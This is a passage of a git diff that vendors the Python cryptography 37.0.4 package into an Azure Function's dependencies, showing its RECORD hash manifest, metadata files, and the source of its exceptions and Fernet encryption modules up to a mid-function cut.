_`security reporting`: https://cryptography.io/en/latest/security/ + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD new file mode 100644 index 0000000..4cca709 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/RECORD @@ -0,0 +1,182 @@ +cryptography-37.0.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +cryptography-37.0.4.dist-info/LICENSE,sha256=Q9rSzHUqtyHNmp827OcPtTq3cTVR8tPYaU2OjFoG1uI,323 +cryptography-37.0.4.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360 +cryptography-37.0.4.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532 +cryptography-37.0.4.dist-info/LICENSE.PSF,sha256=aT7ApmKzn5laTyUrA6YiKUVHDBtvEsoCkY5O_g32S58,2415 +cryptography-37.0.4.dist-info/METADATA,sha256=Kb2UNR81590eIkVsCic1MfyU25jBTS2b4sTvaivzkT0,5454 +cryptography-37.0.4.dist-info/RECORD,, +cryptography-37.0.4.dist-info/WHEEL,sha256=f3qBETQEkAw2gp_UK66CyyDRJ0NORRrrePJfdEDGBj4,112 +cryptography-37.0.4.dist-info/top_level.txt,sha256=zYbdX67v4JFZPfsaNue7ZV4-mgoRqYCAhMsNgt22LqA,22 +cryptography/__about__.py,sha256=--Ir4xTpXvJIAKXDX9hap3KQf2E9--cHRoaKB-fb_cY,417 +cryptography/__init__.py,sha256=j08JCN_u_m8eL-zxbXRxgsriW6Oe29oSSo_e2hyyasg,748 +cryptography/__pycache__/__about__.cpython-39.pyc,, +cryptography/__pycache__/__init__.cpython-39.pyc,, +cryptography/__pycache__/exceptions.cpython-39.pyc,, +cryptography/__pycache__/fernet.cpython-39.pyc,, +cryptography/__pycache__/utils.cpython-39.pyc,, +cryptography/exceptions.py,sha256=sN_VVTF_LuKMM6R-lIASFFuzAmz1uZ2Qbcdko9WyS64,1471 +cryptography/fernet.py,sha256=W1NZKgmIxX-iMJr6GW-vm-j4BkYACKxHjrq4cbIZMaw,6604 +cryptography/hazmat/__init__.py,sha256=OYlvgprzULzZlsf3yYTsd6VUVyQmpsbHjgJdNnsyRwE,418 +cryptography/hazmat/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/__pycache__/_oid.cpython-39.pyc,, +cryptography/hazmat/_oid.py,sha256=CrOgnohV6ckWZU7ZFUYvgf_Gj8npC7LhJfzBB6wLHYc,15440 +cryptography/hazmat/backends/__init__.py,sha256=bgrjB1SX2vXX-rmfG7A4PqGkq-isqQVXGaZtjWHAgj0,324 +cryptography/hazmat/backends/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__init__.py,sha256=7rpz1Z3eV9vZy_d2iLrwC8Oz0vEruDFrjJlc6W2ZDXA,271 +cryptography/hazmat/backends/openssl/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/aead.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/backend.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ciphers.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/cmac.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/decode_asn1.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/dh.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/dsa.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ec.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ed25519.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/ed448.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/encode_asn1.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/hashes.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/hmac.cpython-39.pyc,, 
+cryptography/hazmat/backends/openssl/__pycache__/poly1305.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/rsa.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/utils.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x25519.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x448.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/__pycache__/x509.cpython-39.pyc,, +cryptography/hazmat/backends/openssl/aead.py,sha256=1GASyrJPO8a-mDPTT7VJZXPb_0zEdrkW-Wu_rxV-6RQ,8442 +cryptography/hazmat/backends/openssl/backend.py,sha256=XBpLgVxVYvXwmkdcCwd0bVQWK0EBTHTbCFDsLGsBbBg,96584 +cryptography/hazmat/backends/openssl/ciphers.py,sha256=n3rrPQZi1blJBKqIWeMG6-U6YTvEb8rXGQKn8i-kFog,10342 +cryptography/hazmat/backends/openssl/cmac.py,sha256=K5-S0H72KHZH-WPAcHL5jCtcNyoBZSMe7VmxGn8_VWA,3005 +cryptography/hazmat/backends/openssl/decode_asn1.py,sha256=nSqtgO5MJVf_UUkvw9tez10zhGnsGHq24OP1X2GKOe4,1113 +cryptography/hazmat/backends/openssl/dh.py,sha256=9fwPordToELTkeJ-c7TuO9NiE1vfUBejk2QEUZbvo4s,12230 +cryptography/hazmat/backends/openssl/dsa.py,sha256=awfP80ykAfb4C_I-aOo-PnGU1DF6uf8bnEi-jld18ec,8888 +cryptography/hazmat/backends/openssl/ec.py,sha256=kgxwW508FTXDwGG-7pSywBLlICZKKfo4bcTHnNpsvJY,11103 +cryptography/hazmat/backends/openssl/ed25519.py,sha256=irHT-jSbpTNMMHqw5T885uzAi3Syf3kaaHuTnKgQPSg,5920 +cryptography/hazmat/backends/openssl/ed448.py,sha256=K8HDEiXl98QGJ-4llT4SVZf5-xe8aCuci00DkZf0lhw,5874 +cryptography/hazmat/backends/openssl/encode_asn1.py,sha256=4RUYVTpkYh6J1BnmYdr3G8xv4X1H-K2k2-fQoIDkpHI,570 +cryptography/hazmat/backends/openssl/hashes.py,sha256=3L5bkCOo2LbRSVNGLca_9rpCZ2zb8ISBrMLtts1BkEw,3241 +cryptography/hazmat/backends/openssl/hmac.py,sha256=9RX8bo9ywJievoodxjmqCXmD2iUWyH2jBmw78Hb-pOY,3095 +cryptography/hazmat/backends/openssl/poly1305.py,sha256=_qyGCXNaQVCFpa1qjb_9UtsI6lmnki_15Jbc5vihbeE,2514 +cryptography/hazmat/backends/openssl/rsa.py,sha256=KK97C_jBJEUGfKfJK7E8QZ-uZb6DTJjX6dLOuVbqTI8,20720 +cryptography/hazmat/backends/openssl/utils.py,sha256=7Ara81KkY0QCLPqW6kUG9dEsp52cZ3kOUJczwEpecJ0,1977 +cryptography/hazmat/backends/openssl/x25519.py,sha256=oA_ao4o27ki_OAx0UXNeI2ItZ84Xg_li7It1DxFlrZ0,4753 +cryptography/hazmat/backends/openssl/x448.py,sha256=a_zgqGUpGFvyKEoKRR1vgNdD_gk1gxGYpBp1a6x9HuE,4338 +cryptography/hazmat/backends/openssl/x509.py,sha256=WUoRC6UDM9FkOdn6xR5Mk-v_WCq7eJryenGN9ni8L-A,1452 +cryptography/hazmat/bindings/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/bindings/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/bindings/_openssl.abi3.so,sha256=ve_aeP0LRBDKeLMIFZHefDaeyl_qNpFckeq3pFXpVIY,8032104 +cryptography/hazmat/bindings/_rust.abi3.so,sha256=bZ1mlz1l1tNP4CVdX5h9YFCA84pR7RmMyjRvgEIi8C4,3624096 +cryptography/hazmat/bindings/_rust/__init__.pyi,sha256=ga5QLYp8MmumQB-Rp4TGHq_NAqONcXTrLm2712TZ9Ms,103 +cryptography/hazmat/bindings/_rust/asn1.pyi,sha256=Hovrt8dXZ9p8BKHaroPYmunu1VtDuirslJnE4jTG28s,411 +cryptography/hazmat/bindings/_rust/ocsp.pyi,sha256=jATWMh1yz5JpnnT7A10_sbY-ja5zARnOpZaToLqm43Y,768 +cryptography/hazmat/bindings/_rust/x509.pyi,sha256=YdnUA9uu60WhQP5QihTgo2pBrT49wxYtayCZ4trgZAg,1497 +cryptography/hazmat/bindings/openssl/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/bindings/openssl/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/bindings/openssl/__pycache__/_conditional.cpython-39.pyc,, +cryptography/hazmat/bindings/openssl/__pycache__/binding.cpython-39.pyc,, 
+cryptography/hazmat/bindings/openssl/_conditional.py,sha256=K0JIsYkDBifV-x5WDeq9M1Hofr6HW667rDFlhDEiIMQ,10078 +cryptography/hazmat/bindings/openssl/binding.py,sha256=hWWp-N_JMUuYaNuRHgpadEEdVJsL-wAhdQpTj-Pi0Vc,8044 +cryptography/hazmat/primitives/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc,, +cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc,, +cryptography/hazmat/primitives/_asymmetric.py,sha256=nVJwmxkakirAXfFp410pC4kY_CinzN5FSJwhEn2IE34,485 +cryptography/hazmat/primitives/_cipheralgorithm.py,sha256=zd7N8rBYWaf8tPM7GDtZ9vUgarK_P0_PUNCFi3A0u0c,1016 +cryptography/hazmat/primitives/_serialization.py,sha256=OC_uXC5cNHucoOkHuTsZbfcQ9bvZs1cq7b18TcJu4Es,1341 +cryptography/hazmat/primitives/asymmetric/__init__.py,sha256=s9oKCQ2ycFdXoERdS1imafueSkBsL9kvbyfghaauZ9Y,180 +cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc,, +cryptography/hazmat/primitives/asymmetric/dh.py,sha256=pjjgKFcn2bCAaL_5zr0ygwXM8pHJFyAO6koJFkzhQb8,6604 +cryptography/hazmat/primitives/asymmetric/dsa.py,sha256=dIo6lYiHWRWUCxwejAi01w1-3jjmzEuJovqaVqDO3_g,7870 +cryptography/hazmat/primitives/asymmetric/ec.py,sha256=wX8wH9bD7g7-YxmINam_s9cPc9RUPrui2QdIKg6Q3Nc,14468 +cryptography/hazmat/primitives/asymmetric/ed25519.py,sha256=1qOl1UWV_-cXKHhwlFSyPBdhpx2HMDRukkI6eI5i8vM,2728 +cryptography/hazmat/primitives/asymmetric/ed448.py,sha256=oR-j4jGcWUnGxWi1GygHxVZbgkSOKHsR6y1E3Lf6wYM,2647 +cryptography/hazmat/primitives/asymmetric/padding.py,sha256=EkKuY9e6UFqSuQ0LvyKYKl_L19tOfNCTlHWEiKgHeUc,2690 +cryptography/hazmat/primitives/asymmetric/rsa.py,sha256=GiCIuBuJdpeew-yJ7mnTF4KFH_FUJaut1r-d6TRs31s,11322 +cryptography/hazmat/primitives/asymmetric/types.py,sha256=VidxjUWPOMB8q8vGiaXMhY715Zw8U9Vd4_rkqjOagRE,1814 +cryptography/hazmat/primitives/asymmetric/utils.py,sha256=5hD4KjfMbmozeFq08PLVunHr4FgeVzV1NkKalECM26s,756 +cryptography/hazmat/primitives/asymmetric/x25519.py,sha256=-nbaGlgT1sufO9Ic-urwKDql8Da0U3GL6hZJIMqHgVc,2588 
+cryptography/hazmat/primitives/asymmetric/x448.py,sha256=V3lxb1VOiRTa3bzVUC3uZat2ogfExUOdktCIGUUMZ2Y,2556 +cryptography/hazmat/primitives/ciphers/__init__.py,sha256=Qp78Y3PDSRfwp7DDa3pezlLrED_QFhic_LvDw4LM9ZQ,646 +cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc,, +cryptography/hazmat/primitives/ciphers/aead.py,sha256=QnJD2doZ8XdpCIrDwqJBNgaw2eG9Tx4FWirIP159MAg,11488 +cryptography/hazmat/primitives/ciphers/algorithms.py,sha256=GoM_c2LNonci43B06g0e9zXW6PfBh_uAFiZhIxrQ_x4,4677 +cryptography/hazmat/primitives/ciphers/base.py,sha256=AiCYCzXbSZ9wQbXWMYc60IKmzqz5619YdaaF0zVr4rY,8251 +cryptography/hazmat/primitives/ciphers/modes.py,sha256=Pb2h2X0HUVfM6xKdSZjCgCsUcCQ32mDTSTRQQl4-1Gs,7988 +cryptography/hazmat/primitives/cmac.py,sha256=ODkc7EonY1cRxyJ0SYOuwtiYQv6B0ZPxJQm3rXxfXd4,2037 +cryptography/hazmat/primitives/constant_time.py,sha256=6bkW00QjhKusdgsQbexXhMlGX0XRN59XNmxWS2W38NA,387 +cryptography/hazmat/primitives/hashes.py,sha256=cpaYjgkazlq7Xw0MVoR3cp17mD0TgyEvhZQbyoAWHzU,5996 +cryptography/hazmat/primitives/hmac.py,sha256=M_sa4smPIkO8ra17Xl_cM0daRhGCozUu_8gnHePEIb0,2131 +cryptography/hazmat/primitives/kdf/__init__.py,sha256=DcZhzfLG8d8IYBH771lGTVU5S87OQDpu3nrfOwZnsmA,715 +cryptography/hazmat/primitives/kdf/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/concatkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/hkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/kbkdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/pbkdf2.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/scrypt.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/__pycache__/x963kdf.cpython-39.pyc,, +cryptography/hazmat/primitives/kdf/concatkdf.py,sha256=5YXw8cLZCBYT6rVDGS5URQEeFiPW-ZRBRcPdZQIxTMA,3772 +cryptography/hazmat/primitives/kdf/hkdf.py,sha256=LlDQbCvlNzuLa_UJXrkG5fXGjAjor5Wunv2378TBmms,3031 +cryptography/hazmat/primitives/kdf/kbkdf.py,sha256=QmgJw2_l0D21DEMMfuNQ6e1IaLV3bjwOzMJEAXhpOVs,7699 +cryptography/hazmat/primitives/kdf/pbkdf2.py,sha256=wEMH4CJfPccCg9apQLXyWUWBrZLTpYLLnoZEnzvaHQo,2032 +cryptography/hazmat/primitives/kdf/scrypt.py,sha256=JvX_cD0o0Op5EcFNeZhr-vI5sYv_LdnJ6kNEbW3u5ow,2228 +cryptography/hazmat/primitives/kdf/x963kdf.py,sha256=JsdrJhw2IJVYkl8JIWUN66h7DrKZM2RoQ_tw_iKAvdI,2018 +cryptography/hazmat/primitives/keywrap.py,sha256=TWqyG9K7k-Ymq4kcIw7u3NIKUPVDtv6bimwxIJYTe20,5643 +cryptography/hazmat/primitives/padding.py,sha256=xruasOE5Cd8KEQ-yp9W6v9WKPvKH-GudHCPKQ7A8HfI,6207 +cryptography/hazmat/primitives/poly1305.py,sha256=QvxPMrqjgKJt0mOZSeZKk4NcxsNCd2kgfI-X1CmyUW4,1837 +cryptography/hazmat/primitives/serialization/__init__.py,sha256=RALEthF7wRjlMyTvSq09XmKQey74tsSdDCCsDaD6yQU,1129 +cryptography/hazmat/primitives/serialization/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/base.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/pkcs12.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/pkcs7.cpython-39.pyc,, +cryptography/hazmat/primitives/serialization/__pycache__/ssh.cpython-39.pyc,, 
+cryptography/hazmat/primitives/serialization/base.py,sha256=yw8_yzIvruT6fmS-KrTmIXbAF00rItH48WXTPOSLdJ4,1761 +cryptography/hazmat/primitives/serialization/pkcs12.py,sha256=tHQlCKOY0EfOBBiqR_et4TgcDY_OAtRENC69arjvyLU,6481 +cryptography/hazmat/primitives/serialization/pkcs7.py,sha256=LnISP-1SEDXCpsoEbR0EfuIlWm8eJAgWupt0gvHyyIU,5870 +cryptography/hazmat/primitives/serialization/ssh.py,sha256=Bp4M8yFrLnw9Oj3jCbttewovymCX_OGzBg5GBw4RPpA,23923 +cryptography/hazmat/primitives/twofactor/__init__.py,sha256=ZHo4zwWidFP2RWFl8luiNuYkVMZPghzx54izPNSCtD4,222 +cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc,, +cryptography/hazmat/primitives/twofactor/hotp.py,sha256=v4wkTbdc1E53POx6pdNnEUBvANbmt4f6scQSsTgABeU,2989 +cryptography/hazmat/primitives/twofactor/totp.py,sha256=bIIxOI-LcLGNahB5kN7A_TwEyYMTsLjHd8eJc4b2cLg,1449 +cryptography/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +cryptography/utils.py,sha256=v3zj8FS2bHYAmH__CECwfa0flmFCQnGrxZBRQcDys1A,5627 +cryptography/x509/__init__.py,sha256=yC0TbuvPmWL1U4rEY-0m46SayuxCfPVNFWjJJdi5lY0,7654 +cryptography/x509/__pycache__/__init__.cpython-39.pyc,, +cryptography/x509/__pycache__/base.cpython-39.pyc,, +cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc,, +cryptography/x509/__pycache__/extensions.cpython-39.pyc,, +cryptography/x509/__pycache__/general_name.cpython-39.pyc,, +cryptography/x509/__pycache__/name.cpython-39.pyc,, +cryptography/x509/__pycache__/ocsp.cpython-39.pyc,, +cryptography/x509/__pycache__/oid.cpython-39.pyc,, +cryptography/x509/base.py,sha256=FNBVG8ACCBZLF5TXlq1vjEPWtlR5YZ1Bs25AIxEHI34,33747 +cryptography/x509/certificate_transparency.py,sha256=Elm_-GGA6k9zrcm5KYVY5uTirDsvGc_BUuTLR7Hu-K4,1119 +cryptography/x509/extensions.py,sha256=LFy1jgd_0Z_P-lE2-07nZGJmsFh_1cOOTAl9ejyXFHQ,64999 +cryptography/x509/general_name.py,sha256=S_kJd4ZsNGrMfi2osfFJEWqPxy3oPCAWpLb91yhxzPs,7896 +cryptography/x509/name.py,sha256=EOtO9CscxrfsxhO6GTEfVhiZo3_EE7qGIFfv1eeI4-U,14200 +cryptography/x509/ocsp.py,sha256=OQKsqW_Y4mWY53UT_JG79RJR19xt53Q-iQSSw4m0kZM,16691 +cryptography/x509/oid.py,sha256=CLIlQwzE3PQXMvkKep4JbzVUaRDl_stwcX_U6-s2cNw,794 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL new file mode 100644 index 0000000..1a16dce --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: false +Tag: cp36-abi3-manylinux_2_24_x86_64 + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt new file mode 100644 index 0000000..a229e5f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography-37.0.4.dist-info/top_level.txt @@ -0,0 +1,2 @@ +_openssl +cryptography diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py new file mode 100644 index 0000000..9050849 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__about__.py @@ -0,0 +1,15 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +__all__ = [ + "__version__", + "__author__", + "__copyright__", +] + +__version__ = "37.0.4" + +__author__ = "The Python Cryptographic Authority and individual contributors" +__copyright__ = "Copyright 2013-2022 {}".format(__author__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py new file mode 100644 index 0000000..37b8a7e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__init__.py @@ -0,0 +1,29 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import sys +import warnings + +from cryptography.__about__ import ( + __author__, + __copyright__, + __version__, +) +from cryptography.utils import CryptographyDeprecationWarning + + +__all__ = [ + "__version__", + "__author__", + "__copyright__", +] + +if sys.version_info[:2] == (3, 6): + warnings.warn( + "Python 3.6 is no longer supported by the Python core team. " + "Therefore, support for it is deprecated in cryptography and will be" + " removed in a future release.", + CryptographyDeprecationWarning, + stacklevel=2, + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc new file mode 100644 index 0000000..3b90dd5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__about__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b73e1cc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..02c249b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc new file mode 100644 index 0000000..2137359 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/fernet.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..142a04d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py new file mode 100644 index 0000000..3febede --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/exceptions.py @@ -0,0 +1,68 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import typing + +from cryptography import utils + +if typing.TYPE_CHECKING: + from cryptography.hazmat.bindings.openssl.binding import ( + _OpenSSLErrorWithText, + ) + + +class _Reasons(utils.Enum): + BACKEND_MISSING_INTERFACE = 0 + UNSUPPORTED_HASH = 1 + UNSUPPORTED_CIPHER = 2 + UNSUPPORTED_PADDING = 3 + UNSUPPORTED_MGF = 4 + UNSUPPORTED_PUBLIC_KEY_ALGORITHM = 5 + UNSUPPORTED_ELLIPTIC_CURVE = 6 + UNSUPPORTED_SERIALIZATION = 7 + UNSUPPORTED_X509 = 8 + UNSUPPORTED_EXCHANGE_ALGORITHM = 9 + UNSUPPORTED_DIFFIE_HELLMAN = 10 + UNSUPPORTED_MAC = 11 + + +class UnsupportedAlgorithm(Exception): + def __init__( + self, message: str, reason: typing.Optional[_Reasons] = None + ) -> None: + super(UnsupportedAlgorithm, self).__init__(message) + self._reason = reason + + +class AlreadyFinalized(Exception): + pass + + +class AlreadyUpdated(Exception): + pass + + +class NotYetFinalized(Exception): + pass + + +class InvalidTag(Exception): + pass + + +class InvalidSignature(Exception): + pass + + +class InternalError(Exception): + def __init__( + self, msg: str, err_code: typing.List["_OpenSSLErrorWithText"] + ) -> None: + super(InternalError, self).__init__(msg) + self.err_code = err_code + + +class InvalidKey(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py new file mode 100644 index 0000000..fea0078 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/fernet.py @@ -0,0 +1,212 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
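+#
+# Fernet provides symmetric authenticated encryption: the 32-byte url-safe
+# base64 key is split into a 16-byte HMAC-SHA256 signing key and a 16-byte
+# AES-128-CBC encryption key (see __init__ below).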
+ + +import base64 +import binascii +import os +import time +import typing + +from cryptography import utils +from cryptography.exceptions import InvalidSignature +from cryptography.hazmat.primitives import hashes, padding +from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes +from cryptography.hazmat.primitives.hmac import HMAC + + +class InvalidToken(Exception): + pass + + +_MAX_CLOCK_SKEW = 60 + + +class Fernet: + def __init__( + self, + key: typing.Union[bytes, str], + backend: typing.Any = None, + ): + try: + key = base64.urlsafe_b64decode(key) + except binascii.Error as exc: + raise ValueError( + "Fernet key must be 32 url-safe base64-encoded bytes." + ) from exc + if len(key) != 32: + raise ValueError( + "Fernet key must be 32 url-safe base64-encoded bytes." + ) + + self._signing_key = key[:16] + self._encryption_key = key[16:] + + @classmethod + def generate_key(cls) -> bytes: + return base64.urlsafe_b64encode(os.urandom(32)) + + def encrypt(self, data: bytes) -> bytes: + return self.encrypt_at_time(data, int(time.time())) + + def encrypt_at_time(self, data: bytes, current_time: int) -> bytes: + iv = os.urandom(16) + return self._encrypt_from_parts(data, current_time, iv) + + def _encrypt_from_parts( + self, data: bytes, current_time: int, iv: bytes + ) -> bytes: + utils._check_bytes("data", data) + + padder = padding.PKCS7(algorithms.AES.block_size).padder() + padded_data = padder.update(data) + padder.finalize() + encryptor = Cipher( + algorithms.AES(self._encryption_key), + modes.CBC(iv), + ).encryptor() + ciphertext = encryptor.update(padded_data) + encryptor.finalize() + + basic_parts = ( + b"\x80" + + current_time.to_bytes(length=8, byteorder="big") + + iv + + ciphertext + ) + + h = HMAC(self._signing_key, hashes.SHA256()) + h.update(basic_parts) + hmac = h.finalize() + return base64.urlsafe_b64encode(basic_parts + hmac) + + def decrypt(self, token: bytes, ttl: typing.Optional[int] = None) -> bytes: + timestamp, data = Fernet._get_unverified_token_data(token) + if ttl is None: + time_info = None + else: + time_info = (ttl, int(time.time())) + return self._decrypt_data(data, timestamp, time_info) + + def decrypt_at_time( + self, token: bytes, ttl: 